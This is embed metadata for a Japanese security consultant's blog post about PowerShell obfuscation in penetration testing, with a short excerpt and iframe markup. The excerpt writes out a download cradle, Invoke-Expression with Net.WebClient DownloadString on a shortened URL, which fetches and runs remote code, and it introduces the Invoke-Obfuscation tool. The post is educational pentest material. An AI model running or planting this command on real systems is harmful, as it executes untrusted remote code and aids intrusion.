security_consultant https://blog.hatena.ne.jp/security_consultant/ セキュリティコンサルタントの日誌から https://www.scientia-security.org/ ペネトレーション・テスト PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t") PowerShellの難読化技法については様々な研究がされており、いくつかツールが存在します。今回はそれを紹介します。 Invoke-Obfuscation Invoke-Obfuscationは、任意のPowerShellコマンドを難読化してくれ… 190 <iframe src="https://hatenablog-parts.com/embed?url=https%3A%2F%2Fwww.scientia-security.org%2Fentry%2F2017%2F11%2F13%2F224035" title="PowerShellの難読化について - セキュリティコンサルタントの日誌から" class="embed-card embed-blogcard" scrolling="no" frameborder="0" style="display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;"></iframe> https://cdn-ak.f.st-hatena.com/images/fotolife/s/security_consultant/20171113/20171113221627.png Hatena Blog https://hatena.blog 2017-11-13 22:40:35 rich https://www.scientia-security.org/entry/2017/11/13/224035 1.0 100%